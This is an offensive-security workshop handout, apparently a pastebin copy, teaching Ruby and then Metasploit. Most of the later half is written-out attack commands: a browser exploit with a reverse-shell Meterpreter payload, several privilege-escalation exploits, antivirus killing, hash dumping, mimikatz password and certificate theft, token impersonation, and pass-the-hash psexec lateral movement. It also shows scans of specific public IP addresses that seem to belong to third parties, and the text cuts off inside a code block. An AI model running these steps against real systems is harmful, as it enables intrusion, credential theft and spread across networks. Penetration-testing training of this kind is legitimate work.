djtroby, May 31st, 2017
Metasploit Next Level


##########################
# Download the attack VM #
##########################
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
user: strategicsec
pass: strategicsec

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
user: strategicsec
pass: strategicsec


###########################
# Download the victim VMs #
###########################
https://s3.amazonaws.com/StrategicSec-VMs/Windows7.zip
user: workshop
pass: password

https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
user: administrator
pass: strategicsec

(These are intentionally vulnerable lab images with shared default credentials; keep them on an isolated, host-only
virtual network.)


############################################################
# Section 1: Ruby Fundamentals and Metasploit Architecture #
############################################################

################################
# Chapter 1: Ruby Fundamentals #
################################


- Ruby is a general-purpose, object-oriented, cross-platform dynamic programming language created by Yukihiro
Matsumoto, a computer scientist and programmer from Japan.

- The major implementations of the language are Ruby MRI (the reference implementation), JRuby, HotRuby, IronRuby,
MacRuby, etc. Ruby on Rails is a web framework written in Ruby. Metasploit itself is also written in Ruby, which is
why this course starts here.

- Ruby's file name extensions are .rb and .rbw.

- Official website of the language: www.ruby-lang.org.

- Ruby ships with an interactive shell called IRB (Interactive Ruby).

- Installing and Running IRB

sudo apt-get install ruby2.2 ruby2.2-dev irb rdoc ri

- Open up the interactive console and play around:

irb


- Math, Variables, Classes, Creating Objects and Inheritance

# The basic arithmetic operators:
Addition operator (+) — 10 + 23
Subtraction operator (-) — 1001 - 34
Multiplication operator (*) — 5 * 5
Division operator (/) — 12 / 2      (integer division: 12 / 2 is 6, but 7 / 2 is 3, not 3.5)

# Variables. In Ruby you assign a value to a variable with the assignment operator '='. In the following example,
# 25 is assigned to x and then the expression x + 30 is evaluated (IRB prints 55). Note that x + 30 does NOT change
# x; x is still 25 afterwards. Use x += 30 if you want the new value stored back in x. Likewise 69 is assigned to y
# and y + 33 is evaluated.

x = 25
x + 30
y = 69
y + 33


- Let's look at creating classes and creating objects.

- Here, the name of the class is Attack. An object of this class has properties (the three attributes declared with
attr_accessor, which gives you a getter and a setter method for each) and methods.

class Attack
  attr_accessor :of, :sqli, :xss
end

# Now that we have created the class, let's create an object from it and set its attributes

first_attack = Attack.new
first_attack.of = "stack"
first_attack.sqli = "blind"
first_attack.xss = "dom"
puts first_attack.of
puts first_attack.sqli
puts first_attack.xss


- Let's work on some inheritance, which will make your programming life easier. When we have multiple related
classes, inheritance becomes useful. In simple words, inheritance is a classification of classes: a subclass gets
the attributes and methods of its parent class without having to define them again. Inheritance makes your
programming life easier by maximizing code reuse. Below, every exploit framework class inherits the four accessors
from Exploitframeworks, so Metasploit.new.scanners works without Metasploit declaring anything itself.

class Exploitframeworks
  attr_accessor :scanners, :exploits, :shellcode, :postmodules
end
class Metasploit < Exploitframeworks
end
class Canvas < Exploitframeworks
end
class Coreimpact < Exploitframeworks
end
class Saint < Exploitframeworks
end
class Exploitpack < Exploitframeworks
end


- Methods, More Objects, Arguments, String Functions and Expression Shortcuts

- Let's create a simple method. A method performs an action and is generally called on an object.

- Here, the name of the method is 'learning'. It is defined inside the Msfnl class. When called, it prints the
string "We are Learning how to PenTest".

- An object named 'joe' is created, which is used to call the method.

class Msfnl
  def learning
    puts "We are Learning how to PenTest"
  end
end

# Now let's create an object and call the method on it

joe = Msfnl.new
joe.learning


- An argument is a value or variable that is passed to a method when calling it. In the following example we pass
a string to puts(), which uses it to do its job (print it). Ruby lets you omit the parentheses, so puts "Pentesting"
is the same call.

puts("Pentesting")


- There are many useful string methods in Ruby. The length method returns the length of a string, upcase converts
a string to uppercase, and reverse reverses a string. Methods can be chained, as in the last line. The .class
method works on any object and tells you its type (a number, a String, ...), which is handy in IRB when you are not
sure what a Metasploit API call handed you.

55.class
"I Love Programming".class
"I Love Pentesting".length
"Pown that box".upcase
"Love" + "To Root Boxes"
"evil".reverse
"evil".reverse.upcase


- Expressions and shortcuts. In the example below, 'a' is an operand, '3' is an operand, '=' is an operator, and
'a = 3' is the expression. A statement consists of one or more expressions. Some example expressions:

a = 3
b = 6
a + b + 20
d = 44
f = d
puts f


- Shortcuts: +=, -=, *= and /= are abbreviated assignment operators. They give you the effect of two statements
(compute, then assign the result back) in one. Consider the following statements:

g = 70
g = g + 44
g += 33

- In the last statement, g is incremented by 33 and the result is assigned back to g (exactly what g = g + 33 does).

g *= 3

- In the above statement, g is multiplied by 3 and the result is assigned back to g.


- Comparison Operators, Loops, Data Types, and Constants

- Comparison operators compare one variable or constant with another. We will use the following:
'Less than' operator (<): returns true if the left value is less than the right one.
'Equal to' operator (==): returns true if the two values are equal.
'Not equal to' operator (!=): returns true if the two values are not equal.
(Do not confuse == with =: a single = inside a condition is an assignment, and Ruby will happily accept it.)

numberofports = 55
puts "number of ports found during scan" if numberofports < 300
numberofports = 400
puts "number of ports found during scan" if numberofports < 300
puts "number of ports found during scan" if numberofports == 300
puts "number of ports found during scan" if numberofports != 300


- The 'OR' operator and the 'unless' keyword. The symbol '||' is the logical 'OR' operator; it combines multiple
conditions and returns true if either (or both) of them is true. Consider the following example:

ports = 100
puts "number of ports found on the network" if ports < 100 || ports > 200
puts "number of ports found on the network" if ports < 100 || ports > 75
# unless
portsbelow1024 = 50
puts "If the ports are below 1024" unless portsbelow1024 < 1000
puts "If the ports are below 1024" unless portsbelow1024 < 1055
puts "If the ports are below 1024" unless portsbelow1024 < 20

- The 'unless' keyword runs the statement unless the condition is true, i.e. it is the opposite of 'if'. In the
example above only the last line prints, because 50 < 20 is the only condition that is false.


- Loops execute statement(s) repeatedly. Suppose you want to print a string 10 times; the following example does
that with the times method and a block. The do ... end and { ... } forms are equivalent.

10.times do puts "strategicsec" end
# Or use the curly braces
10.times { puts "strategicsec" }


- Changing Data Types: type conversion gives you flexibility when working with different data types. It is also
known as type casting. Option values and scanner output usually arrive as strings, so converting them with to_i or
to_f comes up constantly in Metasploit modules.

- In the following example, a and b are integers, so a / b is an integer division and 23/25 becomes 0.

- On the other hand, c and d are converted to floats with to_f, so the division keeps the decimal part.

24/4
14.0/5.0
a = 23
b = 25
print a/b
c = 26
d = 33
print c.to_f/d.to_f


- Constants: unlike variables, a constant's value is meant to stay fixed while the program runs. Ruby constants
start with a capital letter. If you reassign a constant, Ruby does not stop you, but it prints a
"warning: already initialized constant" message.


- Multiple Line String Variable, Interpolation, and Regular Expressions

- A multiple line string (a "heredoc") lets you assign a value spanning several lines to a string variable. The
word after << (here "mark") is the terminator; the string ends at the line containing only that word.

strategicsec = <<mark
welcome
to the
best
metasploit
course
on the
market
mark
puts strategicsec


- Interpolation lets you evaluate a placeholder within a string; the placeholder is replaced with the value it
represents. Whatever you write inside #{ } is evaluated and its value is inserted at that position. Interpolation
only happens inside double-quoted strings. Examine the following example:

a = 4
b = 6
puts "a * b = a*b"
puts " #{a} * #{b} = #{a*b} "
person = "Joe McCray"
puts "IT Security consultant person"
puts "IT Security consultant #{person}"

- Notice that only the placeholders inside #{ } are evaluated and replaced with their values; the first and third
puts print their text literally.


- Regular expressions are a powerful technique for text searching and manipulation. Ruby provides built-in support
through the Regexp class, so regular expressions in Ruby are objects of type Regexp.

- A pattern is made of string literals and metacharacters. The / / characters mark the beginning and end of a
pattern in Ruby. In the following example ^ anchors to the start of the string and each . matches one character,
so sub replaces the first four characters ("Woot") with "Today" and returns the new string (a itself is unchanged;
sub! would modify it in place).

a = "Woot Woot, we are learning regular expressions!!"
puts a.sub(/^..../, 'Today')


- Let's loop over the matches. scan finds every match of the pattern and yields each one to the block.

a.scan(/...../) {|w| puts w}
a.scan(/\S\S/) {|w| puts w}


- Character classes: [lma] matches any one of the listed characters, [a-m] matches any character in that range.
(The strategicsec string is here for you to experiment with, e.g. with the \d class, which matches a digit.)

strategicsec = "I Scanned 45 hosts and found 500 vulnerabilities"
"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}


- Arrays, Push and Pop, and Hashes

- In the following example, numbers is an array that holds 6 integers. Array indexes start at 0, so numbers[0] is
2 and numbers[4] is 10.

numbers = [2,4,6,8,10,100]
puts numbers[0]
puts numbers[4]
numbers[2] = 150
puts numbers


- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations: push and pop.
The << operator pushes (appends) an element onto the end of the array (push does the same), and pop removes and
returns the last element, here "payloads".

framework = []
framework << "modules"
framework << "exploits"
framework << "payloads"
framework.pop


- A hash is a collection of elements, like the associative array in other languages. Each element has a key that
is used to access the element. Metasploit module metadata (Name, Description, Author, ...) and module options are
passed around as hashes, so you will see this syntax constantly in the framework.

- Hash is a Ruby object with built-in methods that make it easy to work with. In this example, 'metasploit' is a
hash; 'exploits', 'microsoft' and 'Linux' are the keys, and 'what module should you use', 'Windows XP' and 'SSH'
are the respective values. Assigning to an existing key overwrites its value.

metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
print metasploit.size
print metasploit["microsoft"]
metasploit['microsoft'] = 'redhat'
print metasploit['microsoft']
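
- The regular expression, array and hash material above is exactly what you need to pull structure out of tool
output. The following script is an added example (not part of the original course notes): it parses port scanner
output lines with a named-capture regex, converts the port strings to integers, and collects them into a hash of
host => sorted ports. The sample output is constructed for the example; it imitates the "[+] host:port - TCP OPEN"
style of the tcp scanner module but was not captured from a real run.

```ruby
# Added example, not from the original notes: parse scanner output with a regex and
# collect the results in a hash of host => ports.

# Constructed sample input (not real scanner output); status lines are mixed in on purpose
# so the parser has to ignore them.
SAMPLE_OUTPUT = <<SCAN
[+] 192.168.153.163:22 - TCP OPEN
[+] 192.168.153.163:80 - TCP OPEN
[*] Scanned 1 of 3 hosts (33% complete)
[+] 192.168.153.170:445 - TCP OPEN
[+] 192.168.153.163:3389 - TCP OPEN
[+] 192.168.153.170:139 - TCP OPEN
[*] Auxiliary module execution completed
SCAN

# \A and \z anchor to the whole (stripped) line; (?<name>...) are named captures.
OPEN_PORT_RE = /\A\[\+\]\s+(?<host>\d{1,3}(?:\.\d{1,3}){3}):(?<port>\d{1,5})\s+-\s+TCP OPEN\z/

# Returns a hash of host => sorted array of open ports, ignoring non-matching lines.
def parse_open_ports(output)
  results = Hash.new { |h, k| h[k] = [] }   # auto-create an empty array for a new host
  output.each_line do |line|
    m = OPEN_PORT_RE.match(line.strip)
    next unless m
    results[m[:host]] << m[:port].to_i        # to_i: the port arrived as a String
  end
  results.each_value(&:sort!)
  results
end

# Hosts whose open ports include at least one port from `interesting` (array intersection).
def hosts_with_any(results, interesting)
  results.select { |_host, ports| (ports & interesting).any? }.keys
end

if __FILE__ == $0
  parsed = parse_open_ports(SAMPLE_OUTPUT)
  parsed.each { |host, ports| puts "#{host}: #{ports.join(', ')}" }
  puts "Hosts with SMB or RDP exposed: #{hosts_with_any(parsed, [139, 445, 3389]).join(' ')}"
end
```

Feed it a real saved console log instead of SAMPLE_OUTPUT and you have the start of a triage script; the only part
that changes for a different tool is the regex.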


- Writing Ruby Scripts

- Let's take a look at one of the Metasploit modules written in Ruby and work out exactly what it is doing. The
modules in the portscan directory are port scanners; tcp.rb is a TCP connect scanner that checks every port listed
in its PORTS option and reports the open ones.

cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
ls
ack.rb  ftpbounce.rb  syn.rb  tcp.rb  xmas.rb

- Let's look at tcp.rb


- Now let's create and design our own port scanner. It will scan ports 1-1024 and print "Port Open" for every port
it detects as open. This is a pretty basic script, but it will help you in the event that you need to write
something on the fly. (Scan only hosts you are authorized to test; a connect scan of 1024 ports is very visible in
the target's logs.)


- PortScanner.rb :

require 'socket'
require 'timeout'

puts "Enter IP Address to Scan:"
ipaddress = gets.strip      # strip removes the trailing newline (and any stray whitespace) from the input

1.upto(1024) {|port|
  begin
    # Timeout.timeout is the current spelling; the bare timeout() of older Ruby is gone in 2.3+
    Timeout.timeout(5) do
      sock = TCPSocket.open(ipaddress, port)
      sock.close               # don't leak one socket per open port
    end
    puts "Response/Port Open: #{port}"
  rescue Timeout::Error
    # no SYN/ACK and no RST within 5 seconds: filtered. Uncomment to show them (noisy!)
    #puts "No Response /Port filtered: #{port}"
  rescue Errno::ECONNREFUSED
    # RST received: closed. Uncomment the following line to show closed ports (noisy!)
    #puts "No Response /Port closed: #{port}"
  rescue SocketError, SystemCallError => e
    puts "Error on port #{port}: #{e.message}"   # e.g. unresolvable host, no route
  end
}
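
- The script above gets the job done but hard-codes the port range, serialises every connect (1024 ports at a 5
second timeout against a filtering host takes over an hour) and only prints its findings. The following script is
an added example, not part of the original course notes: it accepts a port specification in the same style as the
PORTS option you type into msfconsole ("22,80,1000-1024"), scans with a small pool of threads, closes every socket,
and returns the open ports from a method so the result can be reused by other code. The file name scanner.rb in
the usage comment is hypothetical.

```ruby
# Added example, not from the original notes: a reusable, threaded TCP connect scanner.
require 'socket'
require 'timeout'

# Expand a Metasploit-style port spec such as "22,80,1000-1024" into a sorted,
# de-duplicated array of Integers. Raises ArgumentError on anything that is not a
# single port or a low-high range within 1..65535.
def parse_ports(spec)
  ports = []
  spec.split(',').each do |item|
    item = item.strip
    case item
    when /\A(\d+)\z/
      ports << $1.to_i
    when /\A(\d+)-(\d+)\z/
      low, high = $1.to_i, $2.to_i
      raise ArgumentError, "bad range: #{item}" if low > high
      ports.concat((low..high).to_a)
    else
      raise ArgumentError, "bad port spec: #{item.inspect}"
    end
  end
  bad = ports.find { |p| p < 1 || p > 65535 }
  raise ArgumentError, "port out of range: #{bad}" if bad
  ports.uniq.sort
end

# TCP connect check for one port: true if the three-way handshake completes.
# A timeout (filtered) and a connection refusal (closed) both count as not open;
# other errors (unresolvable host, no route) propagate so the caller notices.
def port_open?(host, port, timeout = 2)
  Timeout.timeout(timeout) do
    sock = TCPSocket.new(host, port)
    sock.close
    true
  end
rescue Timeout::Error, Errno::ECONNREFUSED
  false
end

# Scan every port in `ports` on `host` using `threads` workers; returns the open ports sorted.
def scan(host, ports, threads: 10, timeout: 2)
  queue = Queue.new
  ports.each { |p| queue << p }
  open_ports = []
  lock = Mutex.new
  workers = Array.new(threads) do
    Thread.new do
      loop do
        port = begin
          queue.pop(true)          # non-blocking pop; raises ThreadError once the queue is drained
        rescue ThreadError
          break
        end
        lock.synchronize { open_ports << port } if port_open?(host, port, timeout)
      end
    end
  end
  workers.each(&:join)
  open_ports.sort
end

if __FILE__ == $0 && ARGV.length == 2
  host, spec = ARGV              # usage (hypothetical file name): ruby scanner.rb 192.168.153.163 1-1024
  scan(host, parse_ports(spec)).each { |p| puts "Response/Port Open: #{p}" }
end
```

Ten threads with a 2 second timeout turns the worst case for 1024 ports from about 85 minutes into under four; keep
the thread count modest, because a burst of connects from one source is exactly what IDS port-scan signatures key
on.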





######################################
# Chapter 2: Metasploit Fundamentals #
######################################

- Let's take a little look at the Metasploit Framework

- First, we should take note of the different directories, the Modular Architecture.

The module types that make up the Modular Architecture are
Exploits
Auxiliary
Payloads
Encoders
Nops
Post


Important directories to keep in mind for Metasploit, in case we'd like to edit different modules or add our own,
are

Modules
Scripts
Plugins
External
Data
Tools

- Let's take a look inside the Metasploit directory and see what's there.

cd ~/toolz/metasploit
ls


- Now let's take a look inside the Modules directory and see what's there.

cd ~/toolz/metasploit/modules
ls

The auxiliary directory is where things like our port scanners live: any module that we can run without needing a
shell or session on a machine first (scanners, fuzzers, sniffers, fake servers).

The exploits directory has the modules we use to pop a shell on a box.

The external directory holds source code and helper material for components that are not framework modules
themselves (shellcode sources and similar pieces that Metasploit ships with).

- Let's take a look at the external directory

cd ~/toolz/metasploit/external
ls


- Our data directory holds supporting files that exploit and auxiliary modules use at runtime.

cd ~/toolz/metasploit/data
ls


- For example, the wordlists directory holds files with wordlists for brute-forcing logins or doing DNS
brute-forcing

cd ~/toolz/metasploit/data/wordlists
ls


- The meterpreter directory inside of the data directory traditionally houses the DLLs that provide Meterpreter's
functionality once a session is created.

cd ~/toolz/metasploit/data/meterpreter
ls


- In our case (Metasploit installed through rvm), the DLLs are shipped in the meterpreter_bins gem instead, at

'~/.rvm/gems/ruby-2.1.5@metasploit-framework/gems/meterpreter_bins-0.0.13/meterpreter/'

ls ~/.rvm/gems/ruby-2.1.5@metasploit-framework/gems/meterpreter_bins-0.0.13/meterpreter/

- The scripts inside the scripts/meterpreter directory are scripts that Meterpreter uses for post-exploitation,
things like escalating privileges and dumping hashes. These are being phased out, though, and post-exploitation
modules (modules/post) are now the preferred way to do the same jobs.

The next important directory that we should get used to is the tools directory. Inside it we'll find a bunch of
different Ruby scripts that help us on a pentest, ranging from creating a unique pattern for exploit development
to the pattern offset script that tells us where in that pattern the overwritten return address came from, so we
know where to place our custom shellcode.

The final directory that we'll need to keep in mind is the plugins directory, which houses the plugins that
integrate other programs with Metasploit and make things like importing and exporting reports simple.

Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
the exploits directory and get a better understanding of how it is structured, so if we make our own modules we
know where everything needs to go.

cd ~/toolz/metasploit/modules/exploits
ls


- The exploits directory is split into several directories, each housing exploits for a different platform, i.e.
windows, unix, osx, dialup and so on. Likewise, inside the windows directory the exploits are broken down further
by the type of service/program they target, so you can pick out an exploit for exactly the service you are
attacking. Let's dig a little deeper into the auxiliary directory and see what it holds for us.

cd ~/toolz/metasploit/modules/auxiliary/
ls


- And a little further in, let's take a look at what's in the scanner directory

cd ~/toolz/metasploit/modules/auxiliary/scanner/
ls

- And one more folder deeper into the structure, let's take a look in the portscan folder

cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
ls


- If we run 'cat tcp.rb' we'll find that this module is simply a TCP connect scanner that finds open TCP ports and
reports them back to us in a nice, easily readable format.

cat tcp.rb


- Keep in mind that the modules in the auxiliary directory are for information gathering (scanning, fuzzing,
sniffing, running fake services) and do not need a session on a machine; the modules you run once you already have
a session live under post.

Taking a look at the payloads directory, we can see all the available payloads, which are what run after an exploit
succeeds.

cd ~/toolz/metasploit/modules/payloads/
ls


- There are three different types of payloads: singles, stagers, and stages. Each type has a different application.

Single payloads are self-contained: everything they need is in one blob, so for example they call a shell back to
you and let you work in that shell with nothing further to download.

Stagers exist for the case where the exploit leaves you only limited payload space. The stager is small; all it does
is connect the victim back to your attack box (or listen for you) and pull down the rest of the instructions, i.e.
the stage.


- Stages are downloaded by stagers and typically do the complex work, like VNC sessions, Meterpreter sessions, or
bind shells.

cd singles
cd windows
ls


- We can see several different payloads here that we can use on a Windows system. Let's take a look at adduser.rb
and see what it actually does.

cat adduser.rb

Looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give that user
a password of "Metasploit$1". Further down in the file we can actually see the command that it gives Windows to add
the user to the system. Those defaults are well known to defenders and show up in the Security event log, so
change the username and password options on a real engagement.


- Stagers connect the victim machine back to yours (reverse) or listen on the victim (bind) in order to download
the stage. You can read the pairing off the payload name: in windows/shell/reverse_tcp the stager is reverse_tcp
and the stage it downloads is shell; windows/shell/bind_tcp is the same stage over a bind stager. (A single is
written with an underscore instead, e.g. windows/shell_reverse_tcp.)

cd ../../stagers
ls


- Again, we can see that we have stagers for multiple systems and architectures.

ls windows/


As you can see, the stagers are mainly there to set up the connection between us and the victim machine, so we
can send over our stage and then run commands through it.

Lastly, we can go to our stages directory to see what payloads are available for us to send over for use with our
stagers...

cd ../stages
ls


Again, we can see that our stages are coded for particular operating systems and architectures. We can take a look
at shell.rb and see how the shell stage is defined: it is the part that is sent across the stager's connection and
runs on the victim, while the stager's options (LHOST/LPORT for a reverse stager) are what tell the victim where to
connect back to.

- Other module directories include nops, encoders, and post. Post modules are used in sessions that have already
been opened (e.g. in Meterpreter) to gain more information on the victim machine, collect hashes or even tokens,
so we can impersonate other users on the system in hopes of elevating our privileges.

cd ../../post/
ls
cd windows/
ls


Inside the windows directory we can see all the post modules that can be run. capture is a directory that holds the
modules to load keyloggers or grab input from the victim machine. escalate has modules that will try to escalate
our privileges. gather has modules that enumerate the host to get as much information as possible out of it. The
wlan directory holds modules that can pull down the WiFi access points the victim has stored in memory/registry
and give you the AP names as well as the WEP/WPA/WPA2 key for each network.

##################
# Day 1 Homework #
##################
Please take screenshots of you doing the first 10 videos in this playlist
https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA

###################################################
# Section 2: Actually Using Metasploit (For real) #
###################################################

sudo /sbin/iptables -F          (flushes every rule in the host firewall so nothing blocks our listeners; fine on
                                 the isolated lab VM, never do this on a box you care about)

cd ~/toolz/metasploit

./msfconsole

##############################################
# Run any Linux command inside of MSFConsole #
##############################################
ls

pwd

ping -c1 yahoo.com

nmap 192.168.153.163

nmap yahoo.com

(msfconsole hands any command it does not recognise to the underlying shell, which is why these work.)


-------------------------------
- You're on the outside scanning publicly accessible targets. (Only scan systems you have authorization to test.)


use auxiliary/scanner/portscan/tcp

set RHOSTS 54.69.156.253

set PORTS 80,1433,1521,3306,8000,8080,8081,10000

run

-------------------------------
use auxiliary/scanner/http/     (press the tab key, then press y to look through the http options)


- Here is an example:
use auxiliary/scanner/http/trace_axd

        - So let's do a quick Google search for someone with a trace.axd file exposed
        - filetype:axd inurl:trace.axd

set RHOSTS 52.10.254.211

set VHOST endlessvacation.com

run

-------------------------------

use auxiliary/scanner/http/http_version

set RHOSTS 54.69.156.253

set RPORT 8081

run


-------------------------------

use auxiliary/scanner/http/tomcat_enum

set RHOSTS 54.69.156.253

set RPORT 8081

run


-------------------------------
- In my opinion a much better option is a script called 'discover' from Lee Baird.

- You can get it here: https://github.com/leebaird/discover

- On the Ubuntu attack host you can run discover by typing the following:
cd ~/toolz/discover
sudo ./discover


- From here you can just follow the prompts. It will run both Nmap NSE scripts and Metasploit aux modules with all
of the correct parameters for you.

##################################
# Basic Client-Side Exploitation #
##################################

echo j0e-r0x > /home/strategicsec/j0e-r0x.txt                   (You can of course replace j0e-r0x with your name)

sudo /sbin/iptables -F

cd ~/toolz/metasploit

./msfconsole

use exploit/windows/browser/ie_cgenericelement_uaf

set ExitOnSession false         (keep the handler running after the first session so further victims can connect)

set URIPATH /ie8

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)

exploit -j                      (-j runs the module as a background job so the console stays usable)


- Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address) given to you by
Metasploit.

- The address will be something like:

http://192.168.153.164:8080/ie8                                            (Make sure you change this to your Ubuntu IP address)


- This simulates a victim clicking on your malicious link and being exploited with a browser exploit. If no session
comes back, check that the Win7 VM can reach port 8080 on the Ubuntu host and that the victim really browsed with
IE8, since this module targets that version.

###########################
# Client-Side Enumeration #
###########################

- You can list the active sessions by typing:

sessions -l


- You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want
to interact with)

sessions -i 1


- You should now see Metasploit's meterpreter prompt.

********************************** Figure out who and where you are **********************************

meterpreter> sysinfo

meterpreter> getuid

meterpreter> ipconfig

meterpreter> run post/windows/gather/checkvm

meterpreter> run get_local_subnets


********************************** Escalate privileges and get hashes **********************************

meterpreter> use priv            (loads the priv extension; 'load priv' is the newer spelling, and recent versions
                                  load it automatically)


--Option 1: GetSystem
meterpreter> getsystem

--Option 2:
meterpreter> run post/windows/escalate/getsystem

--Option 3:
meterpreter> background
back
use post/windows/escalate/droplnk
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 1234
exploit

--Option 4:
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 12345
exploit

--Option 5:
use exploit/windows/local/service_permissions
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 5555
exploit

--Option 6:
use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 4567
exploit

--Option 7:
use exploit/windows/local/ppr_flatten_rec
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 7777
exploit

--Option 8:
use exploit/windows/local/ms_ndproxy
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 7788
exploit

--Option 9:
use exploit/windows/local/ask
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.153.164                                            (Make sure you change this to your Ubuntu IP address)
set LPORT 7799
exploit

- Each local exploit above gets its own LPORT because the handler from the browser exploit is still listening on
the default port; the elevated session calls back to the LHOST/LPORT you set here. Which option works depends on
the patch level and UAC setting of the victim, so expect some of them to fail.

meterpreter > getuid
Server username: win7-64-victim\Workshop
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav           (old Meterpreter script; it kills AV processes by name and is very noisy)

meterpreter> run post/windows/gather/hashdump    (needs SYSTEM; reads the local account hashes out of the SAM)

meterpreter> ps                   (search for a process running as NT AUTHORITY\SYSTEM)

meterpreter> migrate 2800         (your process id WILL NOT be 2800, but make sure you use one that is running as
                                   NT AUTHORITY\SYSTEM)

meterpreter> run post/windows/gather/credentials/credential_collector


********************************** Steal Tokens **********************************

meterpreter > getsystem

meterpreter > use incognito

meterpreter > list_tokens -u

meterpreter > list_tokens -g

meterpreter > impersonate_token                         <-- choose who you want to impersonate, but be sure to use
two backslashes in the name (ex: impersonate_token domain\\user)
  961.  
  962. meterpreter> getuid
  963.  
  964.  
  965. ************ Stealing credentials and certificates ************
  966. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  967.  
  968. meterpreter > getsystem
  969.  
  970. meterpreter > load mimikatz
  971.  
  972. meterpreter > kerberos
  973.  
  974. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  975.  
  976. meterpreter > msv                                                               <-- Your AD password
  977.  
  978. meterpreter > livessp                                                           <-- Your Windows8 password
  979.  
  980. meterpreter > ssp                                                               <-- Your outlook password
  981.  
  982. meterpreter > tspkg                                                             <-- Your AD password
  983.  
  984. meterpreter > wdigest                                                           <-- Your AD password
  985.  
  986. meterpreter > mimikatz_command -f crypto::listStores
  987.  
  988. meterpreter > mimikatz_command -f crypto::listCertificates
  989.  
  990. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  991.  
  992. meterpreter > mimikatz_command -f crypto::patchcapi
  993.  
  994. meterpreter> search -d <directory> -f <file-pattern>
  995.  
  996.  
  997. ********************************** Enumerate the host you are on **********************************
  998.  
  999. meterpreter > run getcountermeasure
  1000.  
  1001. meterpreter> run winenum
  1002.  
  1003. meterpreter > run post/windows/gather/enum_applications
  1004.  
  1005. meterpreter > run post/windows/gather/enum_logged_on_users
  1006.  
  1007. meterpreter > run post/windows/gather/usb_history
  1008.  
  1009. meterpreter > run post/windows/gather/enum_shares
  1010.  
  1011. meterpreter > run post/windows/gather/enum_snmp
  1012.  
  1013. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  1014.  
  1015.  
  1016. ********************************** Prove access **********************************
  1017.  
  1018. meterpreter> upload /home/strategicsec/j0e-r0x.txt c:\\
  1019.  
  1020.  
  1021.  
  1022. ********************************** Lateral Movement *******************************
  1023.  
  1024.  
  1025. Now we can run the PSEXEC exploit.
  1026. -- Option 1:
  1027. use exploit/windows/smb/psexec
  1028.  
  1029. set SMBUser Workshop
  1030.  
  1031. set SMBPass password
  1032.  
  1033. set RHOST 192.168.153.163
  1034.  
  1035. set payload windows/meterpreter/reverse_tcp
  1036.  
  1037. set LHOST 192.168.153.164
  1038.  
  1039. set LPORT 2345
  1040.  
  1041. exploit
  1042.  
  1043.  
  1044.  
  1045.  
  1046. -- Option 2:
  1047. use exploit/windows/smb/psexec
  1048.  
  1049. set SMBUser Workshop
  1050.  
  1051. set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
  1052.  
  1053. set payload windows/meterpreter/reverse_tcp
  1054.  
  1055. set RHOST 192.168.153.163                      
  1056.  
  1057. set LHOST 192.168.153.164
  1058.  
  1059. set LPORT 5678
  1060.  
  1061. exploit
  1062.  
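Option 2 passes the LM:NT pair that hashdump printed straight into SMBPass (pass-the-hash). As an added example, not code from the original notes, the Ruby below parses the pwdump-style lines that run post/windows/gather/hashdump prints, builds the SMBPass value, and flags two things worth checking before trying it: an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 means the account has an empty password (normally a disabled account, never worth a psexec), and an LM hash other than aad3b435b51404eeaad3b435b51404ee means the weak LM hash is still stored and can be cracked offline. The hashdump lines are constructed for this example; only the Workshop line matches the hash used in Option 2.

```ruby
# Added example, not code from the original workshop notes.
# Parse the pwdump-style lines that `run post/windows/gather/hashdump` prints
# and prepare a pass-the-hash psexec, the way Option 2 above does by hand.

# Standard hashes of an empty password (LM and NT respectively).
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

# Constructed sample output. Only the Workshop line is taken from these notes;
# svc_backup carries the LM hash of "password" to show a host that still stores LM.
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
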